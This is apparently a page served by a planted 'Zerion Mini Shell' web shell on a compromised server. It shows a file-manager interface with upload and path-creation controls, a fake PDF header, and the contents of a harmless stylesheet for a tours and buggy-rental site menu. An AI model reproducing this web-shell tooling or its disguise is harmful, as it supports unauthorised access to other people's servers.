%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/styles/
Upload File :
Create Path :
Current File : /var/www/html/styles/Menu.css

.mainMenu {
  position: absolute;
  right: 0;
  top: 0;
  transform: translateX(100%);
}
/* Only above 1024 */
@media (min-width: 1025px) {
  .mainMenu {
    width: 100%;
  }
  .myMenu {
    max-width: 50%;
    margin-left: auto;
  }
}
.myMenu {
  height: 100vh;
  display: flex;
  flex-direction: column;
}

.mainMenu .tours {
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  background-image: url("../public/img/Menu/menu_tours_bg.svg");
  background-size: cover;
  background-color: #f26739;
  padding: 3rem;
  flex: 1;
}

.mainMenu .tours .buttons {
  display: flex;
  align-items: center;
  justify-content: space-between;
}

.mainMenu .menuItems {
  display: flex;
  justify-content: center;
  align-items: center;
  margin: 1.6rem;
  margin-top: 0;
  cursor: pointer;
}

.mainMenu .close {
  display: flex;
  align-items: center;
}

.mainMenu .closeSvg {
  display: flex;
  justify-content: center;
  align-items: center;
  background: #2d2d2d;
  width: 5rem;
  height: 5rem;
  border-radius: 50%;
  background-size: contain;
}

.mainMenu .closeSvg svg {
  width: 3rem;
  height: 3rem;
}

.mainMenu .closeSvg svg {
  margin: 1.4rem;
}

.mainMenu .tours .buttons .menuItems .routes a,
.mainMenu .tours .buttons .menuItems span {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 2.2rem;
  line-height: 2.4rem;
  letter-spacing: -0.005em;
  text-transform: uppercase;
  margin-right: 1.4rem;
  color: #2d2d2d;
  text-decoration: none;
}

.mainMenu .tours h1 {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 7.5rem;
  line-height: 1.1;
  letter-spacing: 0.005em;
  text-transform: uppercase;
  color: #ffffff;
  margin: 1rem;
  margin-top: 0;
}

.mainMenu .tours .bookAtv {
  display: flex;
  flex-wrap: wrap;
  align-content: center;
  justify-content: space-between;
  align-items: stretch;
  height: 30rem;
}

.mainMenu .card {
  flex: 1 0 auto;
  position: relative;
  overflow: hidden;
  border-radius: 2rem;
  margin: 0 1rem;
  width: 30%;
  height: 100%;
}

.mainMenu .card .content {
  display: flex;
  padding: 0 3rem;
  height: 100%;
  align-content: space-between;
  align-items: stretch;
  flex-wrap: wrap;
  position: relative;
  z-index: 2;
}

.mainMenu .content h4 {
  position: relative;
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 2.6rem;
  line-height: 107.04%;
  letter-spacing: 0.005em;
  text-transform: uppercase;
  color: #ffffff;
  flex: 0 0 100%;
  width: 100%;
}

.mainMenu .content .price span {
  font-family: "Inter";
  font-style: normal;
  font-weight: bold;
  font-size: 12px;
  line-height: 1.4rem;
  text-transform: uppercase;
  color: #ffffff;
  flex: 0 0 100%;
  width: 100%;
}

.mainMenu .content .price h3 {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 3.6rem;
  line-height: 1.2;
  letter-spacing: 0.015em;
  text-transform: uppercase;
  color: #ffffff;
  margin: 0;
}
.mainMenu .content .price h3:first-of-type {
  padding-bottom: 1.8rem;
}

.mainMenu .content .price h3 span {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 3.2rem;
  line-height: 100%;
  letter-spacing: 0.015em;
  text-transform: uppercase;
  color: #ffffff;
}

.mainMenu .content .bookNow {
  display: flex;
  justify-content: space-between;
  position: relative;
  align-items: center;
  padding: 0;
  width: 100%;
  background-color: transparent;
  flex: 0 0 100%;
  margin-bottom: 1.9rem;
}

.mainMenu .content .bookNow .click {
  position: relative;
  cursor: pointer;
  align-self: flex-end;
}
.mainMenu .content .bookNow .click:hover .arrows svg {
  transform: translateX(4px);
}

.mainMenu .bookNow .click span {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 1.6rem;
  letter-spacing: -0.005em;
  text-transform: uppercase;
  color: #ffffff;
  align-self: center;
}

.mainMenu .bookNow .click .arrows {
  display: flex;
  justify-content: center;
  align-items: center;
  background: #f26739;
  width: 4.2rem;
  height: 4.2rem;
  border-radius: 50%;
}

.mainMenu .bookNow .click .arrows svg {
  width: 1.5rem;
  height: 1.5rem;
  transform: translateX(0);
  transition: all 0.25s ease-in-out;
}

.mainMenu .card .imgDiv {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.mainMenu .card .imgDiv * {
  width: 100% !important;
  height: 100% !important;
  object-fit: cover;
  object-position: center;
}

.mainMenu h4,
.mainMenu .bookNow {
  z-index: 9999;
}

/* RENT  */

.mainMenu .rent {
  background: #ecf9fe;
  padding: 3rem;
  flex: 1;
}

.mainMenu .rent h1 {
  padding: 2rem 1rem 0 3rem;
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 7.5rem;
  line-height: 8rem;
  letter-spacing: 0.005em;
  text-transform: uppercase;
  color: #2d2d2d;
  margin: 0;
}

.mainMenu .rent .buggies {
  position: relative;
  display: flex;
  justify-content: center;
  align-items: center;
  padding-top: 1.5rem;
}

.mainMenu .rent .buggies .border {
  position: absolute;
  top: -11.5rem;
}
@media (max-width: 768px) {
  .mainMenu .rent .buggies .border {
    top: 2.5rem;
  }
}
@media (max-width: 500px) {
  .mainMenu .rent .buggies .border {
    display: none;
  }
}

.mainMenu .rent .buggies .border svg {
  height: 50rem !important;
}

.mainMenu .rent .buggies .buggyImg {
  position: relative;
  width: 27.4rem;
  height: 21.3rem;
  display: flex;
  align-items: center;
  justify-content: center;
  /* padding-bottom: 1.5rem; */
}

.mainMenu .card .imgDiv::after {
  content: "";
  background: linear-gradient(180deg, rgba(42, 41, 46, 0) 0%, #000000 100%);
  position: absolute;
  width: 100%;
  height: 100%;
  z-index: 1;
  top: 0;
  left: 0;
}
.mainMenu .card .imgDiv::before {
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  z-index: 1;
  top: 0;
  left: 0;
  background: rgba(0, 0, 0, 0.58);
}

.mainMenu .rent .buggies .buggyCard {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  width: 50%;
  position: relative;
}

.mainMenu .rent .buggies .buggyCard .specs {
  display: flex;
  flex-direction: column;
  align-items: center;
  flex: 0 0 100%;
  max-width: 100%;
  padding-top: 1.2rem;
  text-align: center;
}
@media (max-width: 1440px) {
  .mainMenu .rent .buggies .buggyCard .specs {
    padding-top: 20px;
  }
}
.mainMenu .rent .buggies .buggyCard .specs .specImg {
  position: relative;
  width: 100%;
  height: 100%;
}
@media (max-width: 1440px) {
  .mainMenu .rent .buggies .buggyCard .specs .specImg {
    height: 100%;
    width: 100%;
    object-fit: cover;
  }
}

.mainMenu .rent .buggies .buggyCard .specs h5 {
  font-family: "Anton";
  font-style: normal;
  font-weight: normal;
  font-size: 2.6rem;
  line-height: 107.04%;
  text-align: center;
  letter-spacing: 0.005em;
  text-transform: uppercase;
  color: #2d2d2d;
  margin: 0;
}

.mainMenu .rent .buggies .buggyCard .specs img {
  padding-bottom: 1rem !important;
}

.mainMenu .rent .buggies .buggyCard .rentBtn {
  display: none;
  position: absolute;
  top: 40%;
  left: 50%;
  transform: translate(-50%, -50%);
}

.mainMenu .rent .buggies .buggyCard .rentBtn button {
  width: 12rem;
  font-family: "Anton";
  text-transform: uppercase;
  background: #f26739;
  color: #ffffff;
  padding: 0.5rem 0;
  font-size: 1.5rem;
  cursor: pointer;
  border: 0.2rem solid white;
  border-radius: 100px;
}

@media (min-width: 260px) and (max-width: 720px) {
  .myMenu {
    height: auto;
  }
  .mainMenu .card {
    width: 90%;
    height: 100%;
    margin: 1rem;
  }
  .menu {
    overflow-y: scroll;
  }
  .mainMenu {
    position: unset;
  }
  .mainMenu .tours {
    display: flex;
    flex-direction: column;
    padding: 0 0;
  }
  .mainMenu .closeSvg {
    width: 36px;
    height: 35px;
  }
  .mainMenu .closeSvg svg {
    margin: 1.8rem;
  }
  .mainMenu .menuItems {
    justify-content: space-between;
    align-self: flex-end;
  }
  .mainMenu .tours .buttons {
    position: relative;
    flex-direction: column-reverse;
    padding: 15px;
  }
  .mainMenu .tours .buttons .menuItems .routes a {
    font-size: 19px;
    margin-right: 30px;
    line-height: unset;
  }
  .mainMenu .tours .buttons .menuItems span {
    display: none;
  }
  .mainMenu .tours h1 {
    align-self: flex-start;
    font-size: 75px;
    margin: 44px 0 15px 0;
  }
  .mainMenu .content .bookNow {
    position: unset;
  }
  .mainMenu .content .bookNow .click {
    margin: 3rem;
  }
  .mainMenu .bookNow .click .arrows {
    width: 9rem;
    height: 9rem;
  }
  .mainMenu .bookNow .click .arrows svg {
    width: 3.5rem;
    height: 3.5rem;
  }
  .mainMenu .tours .bookAtv {
    height: 100%;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    padding: 0 0 12rem 0;
  }
  .mainMenu .content h4 {
    font-size: 30px;
    width: 70%;
    flex: 0 0 70%;
  }
  .mainMenu .content .price span {
    font-size: 14px;
    line-height: 100%;
    width: 100%;
  }
  .mainMenu .content .price h3 span {
    position: unset;
    font-size: 40px;
  }
  .mainMenu .content .price h3 {
    font-size: 73px;
  }
  .mainMenu .card .imgDiv {
    width: 100%;
    height: 100%;
  }

  /* Rent  */
  .mainMenu .rent h1 {
    font-size: 75px;
    padding: 10rem 1rem 15rem 3rem;
  }
  .mainMenu .rent .buggies {
    flex-direction: column;
  }
  .mainMenu .rent .buggies .buggyImg {
    width: 50rem;
    height: 100%;
  }
  .mainMenu .rent .buggies .buggyCard {
    padding-bottom: 30px;
  }
  .mainMenu .rent .buggies .buggyCard .specs {
    padding-top: 3.2rem;
  }

  .mainMenu .rent .buggies .buggyCard .specs .specImg {
    width: 30rem;
  }

  .mainMenu .rent .buggies .buggyCard .specs h5 {
    font-size: 26px;
  }
  .mainMenu .rent .buggies .buggyCard .rentBtn {
    left: 25.5rem;
    top: 21rem;
  }
  .mainMenu .rent .buggies .buggyCard .rentBtn button {
    font-size: 3rem;
    width: 22rem;
  }
}

/* @media (min-width: 1025px) and (max-width: 1434px) {
  .mainMenu .rent .buggies {
    padding-top: 8rem;
  }
} */

@media (min-width: 721px) and (max-width: 1024px) {
  .mainMenu .tours {
    display: flex;
    justify-content: center;
    /* align-items: center; */
    flex-direction: column;
    padding: 0 3rem;
  }
  .mainMenu .menuItems {
    margin-left: 39rem;
  }

  .mainMenu .tours .buttons .menuItems .routes a,
  .mainMenu .tours .buttons .menuItems span {
    font-size: 18px;
  }
  .mainMenu .tours h1 {
    margin: 1rem 0 3rem 3rem;
  }
  .mainMenu .tours .bookAtv {
    padding: 0 0 3rem 1.8rem;
  }
  .mainMenu .rent {
    padding: 1rem 1.5rem 3rem 1.5rem;
  }
  .mainMenu .rent h1 {
    padding: 0 1rem 0 3rem;
  }
  .mainMenu .rent .buggies {
    padding-top: 6.6rem;
  }
  .mainMenu .rent .buggies .buggyImg {
    width: 35.4rem;
    height: 28.3rem;
  }
  .mainMenu .rent .buggies .buggyCard .specs h5 {
    font-size: 4.2rem;
  }
}

Zerion Mini Shell 1.0